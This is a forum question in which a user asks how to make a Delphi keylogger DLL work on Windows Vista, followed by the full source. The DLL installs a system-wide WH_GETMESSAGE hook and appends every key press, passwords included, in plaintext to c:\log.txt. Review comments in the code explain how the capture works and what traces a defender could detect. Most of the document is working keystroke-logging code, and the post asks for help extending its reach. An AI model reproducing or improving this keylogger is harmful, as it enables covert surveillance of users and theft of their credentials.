troubleshooting Question

Advanced keylogger running on Windows Vista

dinamicart asked on
DelphiSecurityEditors IDEs
I used the following program to capture keystrokes and log them to a file. It works well on Windows XP, but on Windows Vista I was unable to use it: it logs only the characters typed in the form where I set the StartTheHook procedure, and when I switch windows it does not log anything. Can someone give me a hint about how I can modify this code to work with Windows Vista?

Thank you!
library TheHook;
 
uses
  Windows,
  Messages,
  SysUtils;
 
var
  // Handle returned by SetWindowsHookEx in StartTheHook; StartTheHook and
  // StopTheHook both treat 0 as "no hook installed".
  TheHookHandle: HHOOK;
  // Text-file variable TheHookProc uses to open, write and close the log.
  FF: TextFile;
  // Log file path; assigned inside TheHookProc each time an event is logged.
  FileName: string;
 
// TheHookProc is the callback that StartTheHook registers as a WH_GETMESSAGE
// hook. For every WM_KEYDOWN / WM_KEYUP message it is handed, it builds one
// line ("KEYDOWN <key>" or "KEYUP   <key>") and appends it to c:\log.txt.
//
// Parameters:
//   Code   - hook code; only HC_ACTION is processed.
//   wParam - not examined here; only forwarded to CallNextHookEx.
//   lParam - dereferenced as a pointer to a tagMSG record (the message).
// Returns 0, except when Code < 0, where the result of CallNextHookEx is
// returned.
//
// Security review note: this is keystroke capture. Everything typed into a
// window whose messages reach this callback, passwords included, is written
// in plaintext to a fixed path. The artefacts a defender can look for are
// visible in this file: the SetWindowsHookEx(WH_GETMESSAGE, ...) call in
// StartTheHook, this library appearing in the module list of processes that
// did not load it themselves, and c:\log.txt being opened, appended to and
// closed once per key event.
function TheHookProc(Code : integer; wParam : DWORD; lParam : DWORD): longint; stdcall;
var
  LogText: string;
  KeyState: TKeyBoardState;
  VirtualKey: byte;
  ScanCode: byte;
  AChar: array[0..1] of Char;
  buf: string;
begin
  result := 0;
  if (Code = HC_ACTION) then begin
    // lParam is reinterpreted as a tagMSG; only key-up and key-down messages
    // are logged, every other message falls through untouched.
    if (tagMSG(Ptr(lParam)^).Message = WM_KEYUP) or (tagMSG(Ptr(lParam)^).Message = WM_KEYDOWN) then begin
      // record UP/DOWN state
      if (tagMSG(Ptr(lParam)^).Message = WM_KEYUP) then LogText := 'KEYUP   '
      else LogText := 'KEYDOWN ';
     
      // translate the key to ASCII
      // The keyboard state is read with GetKeyboardState at the moment the
      // callback runs. The virtual-key code is the message's WParam truncated
      // to a byte; ScanCode is the high byte of the low word of the message's
      // lParam. The return value of ToAscii is discarded.
      GetKeyboardState(KeyState);
      VirtualKey := tagMSG(Ptr(lParam)^).WParam;
      ScanCode := HIBYTE(LOWORD(tagMSG(Ptr(lParam)^).lParam));
      ToAscii(VirtualKey, ScanCode, KeyState, AChar, 0);
 
      // exceptions
      // Keys listed here are logged by name; anything else is logged as the
      // first character ToAscii placed in AChar.
      case VirtualKey of
        VK_BACK: buf := 'Backspace';
        VK_DELETE: buf := 'Delete';
        VK_TAB: buf := 'Tab';
        VK_RETURN: buf := 'Enter';
        VK_SHIFT: buf := 'Shift';
        VK_CAPITAL: buf := 'CapsLock';
        VK_ESCAPE: buf := 'Esc';
        VK_SPACE: buf := 'Space';
        // etc. keys you're interested in
      else
        buf := AChar[0];
      end;
 
      LogText := LogText + buf;
 
      // open the log file
      // The path is hard-coded; the file is created if missing, otherwise
      // opened for append. FF and FileName are the unit-level variables.
      FileName := 'c:\log.txt'; // your log filename here
      AssignFile(FF, FileName);
      if FileExists(FileName) then Append(FF)
      else Rewrite(FF);
 
      // write to the log
      WriteLn(FF, LogText);
 
      // close the log file
      CloseFile(FF);
    end;
  end;
  {Call the next hook in the hook chain}
  // NOTE(review): the chain is continued only for Code < 0. For Code >= 0
  // this procedure returns 0 without calling CallNextHookEx, so other hooks
  // installed on the same chain may not be notified. The Win32 documentation
  // recommends calling CallNextHookEx in both cases.
  if (Code < 0) then
    result := CallNextHookEx(TheHookHandle, Code, wParam, lParam);
end;
 
// StartTheHook registers TheHookProc as a WH_GETMESSAGE hook, unless a hook
// handle is already stored in TheHookHandle.
//
// Security review note: the module argument is this library's hInstance and
// the thread id is 0, i.e. the hook is not tied to one thread of the caller.
// This call is the point where host monitoring can observe the hook being
// installed and which module asked for it.
procedure StartTheHook; stdcall;
begin
  // Already installed: do nothing.
  if (TheHookHandle <> 0) then
    Exit;

  // Store whatever SetWindowsHookEx returns (0 if it failed).
  TheHookHandle := SetWindowsHookEx(WH_GETMESSAGE, @TheHookProc, hInstance, 0);
end;
 
// StopTheHook removes the hook recorded in TheHookHandle, if there is one.
// The stored handle is reset to 0 only when UnhookWindowsHookEx reports
// success, so a failed removal leaves the handle in place.
procedure StopTheHook; stdcall;
begin
  // No hook recorded: nothing to remove.
  if (TheHookHandle = 0) then
    Exit;

  // Clear the handle only after a successful unhook.
  if UnhookWindowsHookEx(TheHookHandle) then
    TheHookHandle := 0;
end;
 
// Only the start/stop routines are exported from the library. TheHookProc is
// not exported; it is referenced solely by address in StartTheHook.
exports
  StartTheHook,
  StopTheHook;
 
// Empty library initialisation block: nothing runs when the library loads.
begin
end.